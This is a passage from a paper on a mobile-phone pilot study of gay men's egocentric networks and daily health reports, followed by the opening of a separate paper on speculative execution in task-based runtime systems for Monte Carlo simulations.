a link that directed interested alters to a separate study webpage and in turn, online screener and consent forms. The online form asked alters to enter the first name and phone number of the ego who recruited them so we could construct ego-alter links. Eligible alters fulfilling 2), 4), and 5) were contacted and administered a demographic assessment. We relaxed the requirement for egos to recruit 3 alters and allowed egos and alters to participate if at least 2 alters per egocentric network were recruited. Out of 64 egos who completed a telephone interview, roughly 1 in 5 recruited at least 2 alters and enrolled in the study (n = 12 of 64; Figure 1). We did not follow-up with unenrolled egos to find out the reason. One ego let us know that his friends did not want to join and “share private information”. Out of 68 alters who started the online screener, 75% (n=51) completed the screener and provided contact information to schedule an interview. Thirty two of 36 alters who were interviewed by telephone enrolled in the study. Egos and alters were e-mailed Amazon gift card activation codes worth $60 and $50, respectively, at the end of the study as incentives. Egos and alters who were the most compliant in filling out the daily health assessment were entered into a drawing to also receive an Amazon gift card activation code worth $100. All study procedures were approved by the Institutional Review Board at the University of California, Los Angeles. 2.2 Data collection Telephone interviews were conducted at the beginning of the study prior to the start of the mobile phone health assessment. Egos were queried on where they heard about the study, the model of the mobile phone they would be using during the study, age, and ethnicity. Alters were queried on their relationship to the ego who recruited them, gender, age, ethnicity, whether or not they lived in Los Angeles County, and their sexual orientation. During Figure 1: Recruitment and enrollment of egos (gay men) and alters and initiation of mobile phone-based data collection. Connections insna.org | Volume 34 | Issue 1 | December Mobile Phone Assessment in Egocentric Networks the telephone interview, egos were also administered a 9-item adapted version of the Arizona Social Support Inventory (Barrera & Gottlieb, 1981) to elicit names of people with whom the respondent socializes, lives, eats meals, has sex, does alcohol and drugs, receives health advice, calls upon for material and emotional support, or any other people who were important to them that had not been prompted by the prior name-generator questions. After the 9-item inventory, we asked for names of alters the ego was planning to ask to join them in the study. Almost all of the egos who enrolled in the study recruited at least one alter who had not been prompted by the 9-item inventory (n = 10 of 12). We calculated the size of each egocentric network based on the number of names generated by the 9-item inventory. Seven of the 64 egos gave “other” responses that encompassed multiple people, e.g. “family”, and were excluded from the network-size calculation. Phone logs were recorded through SystemSens (http://systemsens.ohmage.org), an Android application that was designed to collect passive system data and developed through the UCLA Center for Embedded Networked Sensing. Egos with Android phones were asked to download SystemSens to their mobile phone through an e-mail link. Once installed, SystemSens automatically encrypted and uploaded phone-log data (including phone numbers, the duration, and date / time stamp of incoming and outgoing calls and text messages) to servers at UCLA whenever the user charged their phone. To protect the identity of phone numbers belonging to individuals who were not enrolled in the study, all phone numbers in the phone log were scrambled using SHA-256, a cryptographic hash function published by the National Institute of Standards and Technology. There are several notable features of SHA-256. Hashed numbers appear as unique 256-bit values, e.g. “b8475260a8bdd4af2984d7d7d8eb9b5a”. As a result, one is able to identify if two hashed numbers are of the same phone number. However, it is nearly impossible to recover the original phone number from a hashed number alone. The original phone number is necessary to act as a key that unscrambles the hashed number and verifies the original number. Mobile phone assessment. All participants (both egos and alters) were asked to fill out the same daily assessment on their mobile phone for a month. Assessments were launched using the ohmage application (http://www.ohmage.org), an open-source application that is compatible with Android and iPhones. Ohmage allows for assessments to be rapidly authored using the Extensible Markup Language (XML), and allows data to flow from participants’ mobile phones to a centralized database. In this study, ohmage was launched with an HTML5 application implemented using the Mobile Web Framework (MWF). The application runs on both Android and iPhones and is available for download from the Google Play and Apple app stores, respectively. A version of ohmage that is native to Android phones has been implemented in prior studies (Swendeman et al., 2014); feedback from focus groups on prior mobile studies informed the design of the mobile assessment (Ramanathan et al., 2012). Once installed, participants accessed the mobile asssessment through the ohmage dashboard shown in Figure 2A. At the end of each assessment, responses were encrypted, uploaded to servers at UCLA, and removed from the user’s mobile phone, as long as there was network connectivity and the phone battery was not low. Responses could also be manually uploaded at a later time. Mobile phone assessment consisted of 14 questions that participants were asked to fill out at the end of the day for a month. Questions encompassed the Table 1: Frequency of communication with alters based on ego reports (includes face-to-face, telephone, and social media contact) and based on the number of days between phone log calls/ text messages between egos and alters Connections December | Issue 1 | Volume 34 | insna.org Mobile Phone Assessment in Egocentric Networks following domains in the following order: (a) An adapted version of the Healthy Days Symptoms Module from the Health-Related Quality of Life instrument (HRQOL; Centers for Disease Control and Prevention, 1995), including 5 questions on mood, worry, sleep, energy level, and impairment; (b) Daily minutes of exercise and type of exercise, e.g. “Jogging”; (c) Rating of one’s daily eating, e.g. “Less healthy than usual”; (d) A food inventory that was constructed from multiple food inventories (e.g., Fulkerson et al., 2008; Kaiser et al., 2003; Sisk, Sharkey, McIntosh, & Anding, 2010) and designed to fit across two cell phone screens; (e) Sexual behavior, including the number of sexual encounters involving anal or vaginal sex, the number of encounters with “casual (including one-time and first-time) partners”, and condom usage; and (g) Alcohol and substance use. All questions included a “Refuse to answer” response option so that participants were not forced to answer any questions they did not want to. However, we did not want participants to repetitively select refusal responses in order to get through the daily assessment more quickly. We placed additional “speed bump” questions that required participants to specify why they refused to answer the prior question in two places. The first speed- bump question was placed after minutes of exercise were queried, and the second was placed after the number of sexual encounters was queried at approximately the halfway point and end of the assessment. No refusals were entered, except for the impairment question (1 refusal) and substance use (3 refusals). 3. Analytic Strategies and Results 3.1. Sample characteristics Among egos who were interviewed over the telephone (n = 64), the average age was 30.8 years old (range = 18 to 58). Ethnicity was reported as African American (12.5%), Latino (34.4%), White (37.5%), or Other (15.6%). Egos reported a network size of 8.4 members, on average (range = 2 to 30). Networks were fairly homogenous with respect to age and ethnicity. For example, most of the White egos (n = 5 of 6) only recruited White alters. Half of the Latino egos (n = 2 of 4) only recruited Latino alters. 3.2. Call logs Phone logs were recorded for four egos with Android phones. Logs began recording as soon as SystemSens was installed and continued until the end of the study that included the 30-day health assessment time period (range = 20 to 45 days). One ego was only able to recruit one peer and dropped out of the study after 20 days. Similar to Onnela et al. (2007), we excluded one-way communications where calls or text from an ego to a phone number occurred, or vice versa, but were not reciprocated. By focusing on reciprocated communications, we eliminated communications related to single events where egos did not personally know individuals they were communicating with. Two phone log analyses are discussed. Agreement between self-reported contact and phone logs. The frequency of contact with network members is typically self-reported by egos. Given the additional contact information provided by mobile communication (both calls and text messages), a natural question arises. Do phone logs provide overlapping information to self-reported contact or do phone logs provide additional information? Table 1 demonstrates a way to address this question by showing egos’ self- reported frequency of contact with alters that was reported during the telephone interview and the median number of days between mobile communications with alters. Phone logs corroborate the self-reported frequencies fairly well. For example, four of five “daily” reports matched up with call logs where half of the communications occurred within a day of each other. Alter closeness. There is a general understanding in social network research that observed networks in a study are incomplete. Social ties with individuals outside Figure 2: ohmage MWF screenshots showing (A) dashboard for accessing daily health survey and sample questions from the daily health survey, including a (B) multiple-response item and (C) an item requiring numeric entry. Connections insna.org | Volume 34 | Issue 1 | December Mobile Phone Assessment in Egocentric Networks the study network can sometimes be constructed by self-report (e.g., Fowler & Christakis, 2008), though this is typically not the case. Therefore, phone log communication data can fill in gaps on self-reported network compositions. In particular, we focus on the frequency of egos’ mobile communications with recruited alters and individuals outside the study as a proxy for ego-alter closeness. Information on closeness with alters who are likely to be recruited into a study has the potential to inform the design of both social network- based interventions (see Valente, 2012 for a review) and recruitment strategies (e.g., respondent-driven sampling; Heckathorn, 1997, 2002). Figure 3 shows the percentage of communications with each alter and with the remaining telephone numbers in the phone logs. Among these four egos, we note that they recruited at least one alter they were in fairly frequent contact with, e.g. partners for Egos 1 and 3 (15.3% and 20.0% of the total communications, respectively). 3.3. Mobile health assessment We discuss two types of multi-level regression models that address research questions specific to each level of hierarchy in a longitudinal egocentric data set. Network-level questions. Holistic health approaches often track multiple and disparate measures of health. For example, le Roux et al. (2013) examined mental health, general health, and HIV-transmission behaviors. In this vein, we examined how multiple health behaviors and HRQOL cluster within networks. Due to the small sample size, an ad hoc approach was used. Responses for each individual were aggregated over their 30-day study period. We then fit separate multi-level models to each HRQOL or behavioral measure. Pearson product-moment correlations were then examined within the 12 pairs of network-level random effects between all possible pairs of HRQOL and behavioral outcomes. Correlations were in expected directions. For example, at the network level, there were negative correlations between numbers of alcoholic beverages and both mean levels of healthy feelings (r = -.42) and days of exercise (r = -.50). A more formal modeling approach uses a bivariate-outcome multi-level model similar to Comulada et al. (2010, 2012). Here we consider longitudinal egocentric data with two continuous outcome measures, e.g. levels of mood and sleep. For individual i in network n at time point t and outcome k (= 1,2), a bivariate random-intercept linear model on continuous outcome ynitk is expressed as ynitk = xnitk´βk + λnk + ηnik + εnitk, (1) where βk is a vector of regression coefficients for covariate vector xnitk on outcome k. Correlations for each outcome within networks and across repeated observations within individuals are accounted for by random effects λnk and ηnik, respectively. Residual error term εnitk accounts for variance that is unexplained by the random effects. A key feature of the model is that correlations between outcomes are modeled through a variance-covariance matrix that is shared by random effects and residual terms Figure 3: Percentage of (n) reciprocated calls or text messages: Connections December | Issue 1 | Volume 34 | insna.org Mobile Phone Assessment in Egocentric Networks across outcomes. In particular, cross-correlations can be examined between outcomes at different time points, e.g. the relationship between drug use and trust between egos and alters over several time points (Comulada et al., 2012). Individual-level questions. Longitudinal studies typically entail a few time points. Analyses focus on mean changes over time, e.g. decreases in drug use. EMA in our study resulted in numerous time points (intensive longitudinal data; Walls & Shafer, 2006). In larger samples, changes in variability, as well as mean levels, can be examined using location scale models (Hedeker, Mermelstein, & Demirtas, 2008; Hedeker, Demirtas, & Mermelstein, 2009). For example, Hedeker, Demirtas, & Mermelstein (2009) examined mood fluctuations in smokers over time. 4. Discussion Our mobile phone-based pilot study on egocentric networks of gay men and their peers highlights a number of benefits that are scalable to larger studies and other populations. First, recruitment and implementation of the study was carried out without in-person visits with study participants. Second, participants used their own mobile phones, which alleviated the need to carry another electronic data-entry device. Both features served to reduce participant burden and study costs that are associated with traditional studies, e.g. interviewers were not needed. A degree of anonymity was also provided for participants, which may be an important issue for marginalized populations. Past EMA studies have typically relied on paper diaries that are prone to backfilling (Stone et al., 2002, 2003). Palm top computers address this issue, but still introduce a degree of user burden that can be attenuated by making use of an individual’s own mobile phone. An important feature of our study, in terms of data quality, was the ability to visualize uploaded mobile assessment data through a website portal in near real time. Research staff checked the data every few days. In one instance, no data was observed for an alter after initial study enrollment. Telephone contact with the study participant revealed that they were accidentally preventing their assessment data from being uploaded to the study team. The problem was easily corrected, and only a few days of data were lost. The strength of our technologically-driven study design is also an obvious limitation for implementation in other populations. In studying egocentric networks of gay men who use Grindr and live in Los Angeles, we focused on a fairly tech-savvy population. Furthermore, gay men in Los Angeles are often targeted for HIV-related studies, especially through Grindr (e.g., Rendina et al., 2014). At enrollment, a number of our study participants were already familiar with standard study protocols. These characteristics facilitated the use of online recruitment and mobile assessment. Using these tools would be more difficult in other populations where study details are better explained in person and where study participants may be more reluctant to enter sensitive information during a survey, especially on an electronic device. Few concerns were voiced by participants in our study. Online recruitment may be unethical in populations were a language barrier is present, and online consent forms may be easy to click through without understanding the content. Despite the technological savvy of our population, three main limitations remained with our study design. Approximately half of the eligible gay men who clicked through our Grindr banner ad and initiated the online forms, completed the study participation forms (55%; n = 203 / 370; Figure 1). This percentage is similar to initial participation rates that were found in another study that recruited gay men through Grindr and asked them to fill out a one-time online survey (43%; n = 2175 / 5026; Rendina et al., 2014). A big difference between Rendina et al. (2014) and our study is that they retained 27% of the initial gay men in their analysis sample. We retained 12 egos (3%) in our study. Increasing rates of online recruitment offers potential participants a smorgasbord of studies to select from. Moreover, there is less buy-in when shopping amongst online studies. For example, rapport may be established with a recruiter during recruitment in a clinic. Online recruitment may be best suited for studies offering instant participation. Recruitment through Grindr reached gay men with risky sexual behavior profiles as intended; Nineteen percent of interviewed gay men reported anonymous / one-time sex partners in their network during the telephone interview (n = 12 of 64). Yet only one of the 12 (8%) enrolled gay men had reported anonymous partners. Though not statistically significant, this percentage drop suggests that an online forum that attracts users with a targeted behavior is not necessarily a good recruitment source. Another limitation was our restriction of phone- log data collection to Android users. In our study, the majority of participants were iPhone users, e.g. 64% of egos and 70% of alters who filled out online forms. iPhone users tend to have other iPhone users as friends (Canright, 2013). Android and iPhone users also tend to have different demographic and social characteristics (Albanesius, 2011). Phone log-based inference that is based on one type of mobile phone is likely to miss a Connections insna.org | Volume 34 | Issue 1 | December Mobile Phone Assessment in Egocentric Networks segment of the population and be biased. Text message- based assessment that that does not require a smartphone may be a better option in other populations. Lastly, lengthy assessments may call for larger computer screens and human interaction to encourage compliance. Our mobile assessment could be taken in a few minutes. Questions contained a few response categories and mostly fit on one screen. This may partly explain high compliance in our study (a median of 24 days of reporting). The benefits and challenges in our study support a marriage of traditional and new data collection methods that is likely to remain in social network research. Visual web interfaces that allow participants to construct their own personal networks through a self-administered social network inventory have met with limited success; an interviewer may still be necessary (Matzat & Snijders, 2013). Moreover, one mode of electronic communication may not adequately capture social interaction (Quintane & Kleinbaum, 2011). That is why we assessed the frequency of ego-alter contacts through self-report and mobile communication. Despite the challenges of incorporating new technologies into research, the social dynamics of mobile devices and social media are difficult to ignore. It is hard to fully understand the dynamics of health-related behaviors without them. References Albanesius, C. (2011). Infographic: What does the average Android, iOS user look like? pcmag. com. Accessed October 22, 2013. http://www. pcmag.com/article2/0,2817,2391339,00.asp. Barrera Jr., M., & Gottlieb, B.H. (1981). Social support in the adjustment of pregnant adolescents: assessment issues. In: Gottlieb, B.H. (Ed.), Social Networks and Social Support. Sage Publications, Beverly Hills, CA, pp. 69–96. Canright, G. (2013). Who cares what kind of smartphone their friends have? Conference presentation, International Network for Social Network Analysts, SunBelt XXXIII, May 21-26, Hamburg, Germany. Centers for Disease Control and Prevention. (1995). http://www.cdc.gov/hrqol/hrqol14_measure. htm. Comulada, W.S., Rotheram-Borus, M.J., Pequegnat, W., Weiss, R.E., Desmond, K.A., Arnold, E.M., Remien, R.H., Morin, S.F., Weinhardt, L.S., Johnson, M.O., & Chesney, M.A. (2010). Relationships over time between mental health symptoms and transmission risk among persons living with HIV. Psychology of Addictive Behaviors, 24, 109-18. doi: 10.1037/a0018190. Comulada, W.S., Muth, S.Q., & Latkin, C.A. (2012). The analysis of multiple ties in longitudinal egocentric network data: A case study on bidirectional relationships between trust and drug use. Social Networks, 34, 691-700. Fowler, J.H., & Christakis, N.A. (2008). Dynamic spread of happiness in a large social network: longitudinal analysis over 20 years in the Framingham Heart Study. British Medical Journal, 337, a2338. doi: 10.1136/bmj.a2338. Freedman, M.J., Lester, K.M., McNamara, C., Milby, J.B., & Schumacher, J.E. (2006). Cell phones for ecological momentary assessment with cocaine- addicted homeless patients in treatment. Journal of Substance Abuse Treatment, 30, 105-111. Fulkerson, J.A., Nelson, M.C., Lytle, L.A., Moe, S., Heitzler, C., & Pasch, K.E. (2008). The validation of a home food inventory. International Journal of Behavioral Nutrition and Physical Activity, 5, 55. Hall, Jeffrey, A. (2010). Parents’ networks: Egocentric networks and unique and shared sources of social support. Connections, 30, 41-49. Heckathorn, D.D. (1997). Respondent driven sampling: A new approach to the study of hidden populations. Social Problems, 44, 174-199. Heckathorn, D.D. (2002). Respondent-driven sampling II: Deriving valid population estimates from chain-referral samples of hidden populations. Social Problems, 49, 11-34. Hedeker, D., Mermelstein, R.J., & Demirtas, H. (2008). An application of a mixed-effects location scale model for analysis of ecological momentary assessment (EMA) data. Biometrics, 64, 627- 634. Hedeker, D., Demirtas, H., & Mermelstein, R. J. (2009). A mixed ordinal location scale model for analysis of Ecological Momentary Assessment (EMA) data. Statistics and Its Interface, 2, 391-401. Heron, K.E., & Smyth, J.M. (2010). Ecological momentary interventions: incorporating mobile technology into psychosocial and health behaviour treatments. Br J Health Psychol, 15(Pt 1), 1–39. doi.org/10.1348/135910709X466063. Kaiser, L.L., Megar-Quiñonez, H., Townsend, M.S., Nicholson, Y., Fujii, M.L., Martin, A.C., & Lamp, C.L. (2003). Food insecurity and food supplies in Latino households with young children. Journal of Nutrition Education and Behavior, 35, 148- 153. Connections December | Issue 1 | Volume 34 | insna.org Mobile Phone Assessment in Egocentric Networks Kissinger, P., Rice, J., Farley, T., Trim, S., Jewitt, K., Margavio, V., & Martin, D.H. (1999). Application of computer-assisted interviews to sexual behavior research. American Journal of Epidemiology, 149, 950-954. Lazer, D., Pentland, A(S)., Adamic, L., Aral, S., Barabasi, A.L., Brewer, D., Christakis, N., Contractor, N., Fowler, J., Gutmann, M., Jebara, T., King, G., Macy, M., Roy, D., & Van Alstyne, M. (2009). Life in the network: the coming age of computational social science. Science, 323(5915), 721-723. doi: 10.1126/science.1167742. le Roux, I.M., Tomlinson, M., Harwood, J.M., O’Connor, M.J., Worthman, C.M., Mbewu, N., Stewart, J., Hartley, M., Swendeman, D., Comulada, W.S., Weiss, R.E., & Rotheram-Borus, M.J. (2013). Outcomes of home visits for pregnant mothers and their infants: a cluster randomized controlled trial. AIDS, 27, 1461–1471. Matzat, U., & Snijders, C. (2013). The quality of ego- centered social network data in web surveys: experiments with a visual elicitation method. Conference presentation, International Network for Social Network Analysts, SunBelt XXXIII, May 21-26, Hamburg, Germany. Onnela, J.P, Saramäki, J., Hyvönen, J., Szabó, G., Lazer, D., Kaski, K., Kertész, J., & Barabási, A.-L. (2007). Structure and tie strengths in mobile communication networks. Proceedings of the National Academy of Sciences, 104(18), 7332- 7336. Quintane, E., & Kleinbaum, A.M. (2011). Matter over Mind? E-mail data and the measurement of social networks. Connections, 31(1), 20-41. Ramanathan, N., Swendeman, D., Comulada, W.S., Estrin, D., & Rotheram-Borus, M.J. (2012). Identifying preferences for mobile health applications for self-monitoring and self-management: Focus group findings from HIV-positive persons and young mothers. International Journal of Medical Informatics, 82, e38-46. doi: 10.1016/j. ijmedinf.2012.05.009. Rice, E., Comulada, S., Green, S., Arnold, E.M., & Rotheram-Borus, M.J. (2009). Differential disclosure across social network ties among women living with HIV. AIDS and Behavior, 13, 1253-1261. Shiffman, S., Stone, A.A., & Hufford, M.R. (2008). Ecological momentary assessment. Annu Rev Clin Psychol, 4, 1-32. Sisk, C., Sharkey, J.R., McIntosh, W.A., & Anding, J. (2010). Using multiple household food inventories to measure food availability in the home over 30 days: a pilot study. Nutrition Journal, 9, 19. doi:10.1186/1475-2891-9-19. Snijders, T., Spreen, M., & Zwaagstra, R. (1995). The use of multilevel modeling for analysing personal networks: Networks of cocaine users in an urban area. Journal of Quantitative Anthropology, 5, 85-105. Stone, A.A., & Shiffman, S. (1994). Ecological momentary assessment in behavioral medicine. Annals of Behavioral Medicine, 16, 199-202. Stone, A. A., Shiffman, S., Schwartz, J. E., Broderick, J. E., & Hufford, M. R. (2002). Patient non- compliance with paper diaries. BMJ, 324, 1193- 4. Stone, A. A., Shiffman, S., Schwartz, J. E., Broderick, J. E., & Hufford, M. R. (2003). Patient compliance with paper and electronic diaries. Controlled Clinical Trials, 24, 182-99. Swendeman, D., Comulada, W.S., Ramanathan, N., Lazar, M, & Estrin, D. Reliability and validity of daily self-monitoring by smartphone application for health-related quality of life, antiretroviral adherence, substance use, and sexual behaviors among people living with HIV. . (2014). AIDS & Behavior, Epub ahead of print. Valente, T.W. (2010). Social Networks and Health: Models, Methods, and Applications. New York: Oxford University Press. pp. 70-72. Valente, T.W. (2012). Network interventions. Science, 337, 49-53. Walls, T.A., & Shafer, J.L. (2006). Models for Intensive Longitudinal Data. Oxford University Press. Yang, C., Latkin, C., Muth, S.Q., & Rudolph, A. (2013). Injection drug users’ involvement in drug economy: dynamics of sociometric and egocentric social networks. Connections, 33, 24- 34. Ye, Q., Zhu, T., Hu, D., Wu, B., Du, N., & Wang, B. (2008). Cell phone mini challenge award: Social network accuracy – exploring temporal communication in mobile call graphs. IEEE Symposium on Visual Analytics Science and Technology, October 19-24, Columbus, Ohio, USA. doi: 10.1109/ VAST.2008.4677389. Zhang, H., & Dantu, R. (2010). Predicting social ties in mobile phone networks. Intelligence and Security Informatics (ISI), May 23-26, Vancouver, BC, Canada. doi: 10.1109/ISI.2010.5484780. work_zmfcmcryxjg5rb3adtopcdqnza ---- Submitted 22 December 2018 Accepted 26 February 2019 Published 18 March 2019 Corresponding author Bérenger Bramas, berenger.bramas@inria.fr Academic editor Gang Mei Additional Information and Declarations can be found on page 22 DOI 10.7717/peerj-cs.183 Copyright 2019 Bramas Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Increasing the degree of parallelism using speculative execution in task-based runtime systems Bérenger Bramas CAMUS Team, Inria Nancy—Grand Est, Illkirch-Graffenstaden, France ABSTRACT Task-based programming models have demonstrated their efficiency in the develop- ment of scientific applications on modern high-performance platforms. They allow delegation of the management of parallelization to the runtime system (RS), which is in charge of the data coherency, the scheduling, and the assignment of the work to the computational units. However, some applications have a limited degree of parallelism such that no matter how efficient the RS implementation, they may not scale on modern multicore CPUs. In this paper, we propose using speculation to unleash the parallelism when it is uncertain if some tasks will modify data, and we formalize a new methodology to enable speculative execution in a graph of tasks. This description is partially implemented in our new C++ RS called SPETABARU, which is capable of executing tasks in advance if some others are not certain to modify the data. We study the behavior of our approach to compute Monte Carlo and replica exchange Monte Carlo simulations. Subjects Distributed and Parallel Computing Keywords STF, Monte-Carlo, Speculation, Task-based INTRODUCTION Parallel CPUs are now everywhere, from mobile phones to high-performance computing nodes. To efficiently use this type of architecture, it is necessary to design applications to execute in parallel. This parallelization can be done in many ways with different paradigms. Among them, the task-based approaches have demonstrated successful exploitation of the parallelism of an algorithm by simply using the real dependencies between the data. In turn, the division of the algorithm into tasks cannot use dependencies at a low level, such as the instruction level, because of the runtime and context management overheads but has to instead find the appropriate granularity to balance between the degree of parallelism and chunk of work. Using task-based methods, it is possible to dissociate the parallelization algorithm from the rest of the code, composed of computational kernels and data structure definitions, but also from the hardware. This is intended to reduce issues coming from management of parallelization but also to avoid re-writing the application due to hardware changes. The complexity is then in the runtime system (RS), which is in charge of managing the execution, the distribution of the work, and the coherency. This also gives opportunities for specialists in scheduling or concurrent programming to improve these layers with a possible direct impact on the applications on the top. How to cite this article Bramas B. 2019. Increasing the degree of parallelism using speculative execution in task-based runtime systems. PeerJ Comput. Sci. 5:e183 http://doi.org/10.7717/peerj-cs.183 https://peerj.com mailto:berenger.bramas@inria.fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.183 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.183 On the other hand, the features and expressiveness of each RS can be different, and some very specific features could be needed for certain classes of algorithms. This was the starting point of our work while developing Monte Carlo (MC) and replica exchange Monte Carlo (REMC) algorithms for protein simulations. The description using tasks and dependencies of these algorithms gives a low degree of parallelism. However, some write dependencies are actually not true because a task might ultimately not modify the data, but this cannot be known in advance. This motivated us to look to the side of speculative execution, with a primary objective of improving the scalability of the MC/REMC algorithms. Secondary objectives are to get a generic pattern/method to use speculation in task-based RS’s and to use only features that already exist in most task-based RS’s (tasks). The main contributions of our study are the following: • Describe a general approach to include speculation in task-based RS’s. • Detail a possible implementation of this new strategy. • Introduce SPETABARU, a new task-based RS capable of speculation. • Illustrate how speculation can speed up MC and REMC simulations. The current paper is organized as follows. In ‘Motivation Example: Monte Carlo Simulations’, we describe the MC and REMC simulations and discuss how they are usually parallelized as a motivation to our work. ‘Background’ introduces the notions related to RS’s and speculative executions. ‘Speculation in Task-Based Runtime Systems’ describes our new strategy and how it can be implemented in a regular task-based RS. Finally, ‘Performance Study’ presents a performance study for executing MC and REMC simulations with speculation. MOTIVATION EXAMPLE: MONTE CARLO SIMULATIONS The MC method is widely used in simulations of physical systems, especially when there are many coupled degrees of freedom that make traditional approaches inefficient or too expensive. Among this large class of solvers, we focus on the Monte Carlo simulations that use the Metropolis–Hastings update. We refer to the studies in protein simulation (see Thachuk, Shmygelska & Hoos, 2007; Kim & Hummer, 2008) to illustrate more precisely the type of problem we focus on. Let us consider a system composed of multiple groups of beads/particles called domains. A domain can be a peptide in studies that focus on biomolecules in an all-atom approach. The energy of the system is a quadratic pair-wise computation between all particles in the system. A domain can move, that is, it can rotate, shift, or even redistribute its particles in space, which leads to a recomputation of the energy. The objective of such a problem generally is to find the configuration, meaning the position of the domains/beads, with the lowest energy. In the corresponding algorithm, a single stochastic process evaluates the energy of the system and accepts/rejects updates based on the temperature T. This T influences the probability for a change to be accepted, and with a high temperature the updates are more likely to be accepted. The MC simulation method is shown in Algorithm 1. At line 3, the energy is computed for the default configuration. Then, for a given number of iterations, Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 2/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.183 the algorithm uses the domains and updates them (see line 10). It continues by computing the new energy with this domain that moved at line 11. At line 13, we use the Metropolis formula to decide, based on the energy difference and temperature, if the change has to be accepted. In case it is, we keep the change by replacing the old domain’s position with the new one (see line 14). ALGORITHM 1: Monte Carlo simulation algorithm. 1 function MC(domains, temperature) 2 // Compute energy (particle to particle interactions) 3 energy← compute_energy(domains) 4 MC_Core(domains, temperature, energy) 5 function MC_Core(domains, temperature, energy) 6 // Iterate for a given number of iterations 7 for iter from 1 to NB_LOOPS_MC do 8 for d in domains do 9 // Move a domain and compute new energy 10 new_d←move(temperature, d) 11 new_energy←update_energy(energy, new_d, domains) 12 // Accept the move (or do nothing) 13 if random_01()≤metropolis(new_energy, energy, temperature) then 14 domains← replace(domains, d, new_d) 15 energy←new_energy 16 end 17 end 18 end Replica exchange Monte Carlo simulation (REMC) The MC algorithm might get trapped in local minimums or miss all local minimums, depending on T. The idea of the REMC, also known as parallel tempering, is to run several MC simulations of the same system, but each with a different temperature. Consequently, the acceptance rate and the speed of changes are very different for each of them. Then, at defined iterations, the simulations are exchanged, again using the Metropolis formula. Therefore, simulations that run at high temperatures and where modifications were easily accepted will then run at a lower temperature. Algorithm 2 contains the different steps to be done with N different replicas/temper- atures. At line 4, we compute the energy for all randomly initialized systems. Then, the algorithm iterates for a given number of times and first performs a call to the MC algorithm for each configuration, line 10. Second is an exchange stage between configurations, starting at line 7. It is common that the exchange_list is designed such that the exchange happens between odd–even pairs of simulation when iter is odd and even–odd otherwise. Parallelization of MC and REMC The data dependencies for both the MC and REMC algorithms are easy to extract. In the MC algorithm, each iteration depends on the previous one. The changes are only dependent over the domain, but to compute a new energy we have to know if the change of the previous domain has been accepted or not. Consequently, the only parallelism that can be applied is inside the computation of the energy, possibly with a fork-join strategy. The same is true for the REMC, with the difference that the calls to the N different MC simulations can be done in parallel. Therefore, it is common to use one thread or one process per replica. In Altekar et al. (2004), the authors proposed a point-to-point exchange Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 3/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.183 ALGORITHM 2: Replica Exchange Monte Carlo (parallel tempering) simulation algorithm. 1 function REMC(domains[N], temperature[N]) 2 // Compute energy (particle to particle interactions) 3 for s from 1 to N do 4 energy[s]← compute_energy(domains[s]) 5 end 6 // Iterate for a given number of iterations 7 for iter from 1 to NB_LOOPS_REMC do 8 for s from 1 to N do 9 // Compute usual MC for each simulation 10 MC_Core(domains[s], temperature[s], energy[s]) 11 end 12 // Compare based on a given strategy 13 for s in exchange_list(iter) do 14 // Use the energy difference between s and s+1 to decide to exchange them 15 if random_01()≤metropolis(energy[s] - energy[s+1], temperatures[s]) then 16 swap(domains[s], domains[s+1]) 17 swap(energy[s], energy[s+1]) 18 end 19 end 20 end scheme. They distributed N replicas among P processes and ensured that there was no global barrier; in other words, only the processes that have to exchange simulations communicate. The same principle applies in Zhou et al. (2013) with one process per temperature/replica. Similarly, in Gross, Janke & Bachmann (2011), the authors dedicated one thread or one GPU per replica. Finally, in Treikalis et al. (2016), the authors proposed a parallel framework for plugging in MC-based applications. They also remind that asynchronous RE (so without a global barrier) is needed in many cases. However, no matter how efficient the implementation, synchronizations between the domains in the MC and the replicas in the REMC must be done. But it appears clear that these dependencies are sometimes not needed when the changes are rejected because the data are left unchanged, so it could be possible to compute in advance, hoping that the result will not be invalid. The main part of the current study is to provide a system for this compute-in-advance on top of an RS. BACKGROUND Task-based parallelization Most HPC applications that support shared-memory parallelization rely on a fork-join strategy. Such a scheme uses a simple division of the work into independent operations and a global barrier that ensures all the work is done before the execution continues. The most common feature is the for-loop parallelization using pragmas as proposed by the OpenMP (OpenMP Architecture Review Board, 1997) standard. This model has been extended to a tasks-and-wait scheme, where operations come from different parts of the application but are still independent. The task model from OpenMP 3 (OpenMP Architecture Review Board, 2008; Ayguadé et al., 2009) and the task-based programming language Cilk (Blumofe et al., 1996) (later extended in Cilk++ (Leiserson, 2009) and Cilk Plus (Intel, 2017)) follow this idea. This is still a fork-join model because successive spawn phases of independent tasks (fork) must be explicitely synchronized (join) to ensure a Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.183 4/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.183 correct execution. This really limits the scalability because of the waiting time and the imbalance between tasks. Developers are able to increase the degree of parallelism by using multiple sources of tasks that they known are independent. But then it starts to become manual management of the dependencies, which a modern task-based RS is intended to do. An algorithm can be decomposed in interdependent operations where the output of some tasks is the input of others. A task-based implementation will map tasks over these operations and create dependencies between them to ensure execution coherency. The result can be seen as a direct acyclic graph (DAG) of tasks, or simple graph of tasks, where each node is a task and each edge is a dependency. An execution of such a graph will start from the nodes that have no predecessor and continue inside the graph, ensuring that when a task starts, all its predecessors have completed. The granularity of the tasks, that is, the content in terms of computation, cannot be too fine-grained because the internal management of the graph implies an overhead that must be negligible to ensure good performance, as shown in Tagliavini, Cesarini & Marongiu (2018). Therefore, it is usually the developer’s responsibility to decide what a task should represent. The granularity is then a balance between the degree of parallelism and the RS overhead. For that reason, several researches are conducted to delegate partially or totally the RS system to the hardware with the objective of relieving the worker threads, as in Chronaki et al. (2018). Building a graph of tasks can be done in two major ways. The first possibility is to build a graph by creating the nodes and connections between them explicitly, as it is used in the parametrized task graph (PTG) model (Cosnard & Loi, 1995). This approach is complex and usually requires completely rewriting an application. The second method is the sequential task flow (STF) (Agullo et al., 2016b). Here, a single thread creates the tasks by informing the RS about the access of each of them on the data. The RS is then able to 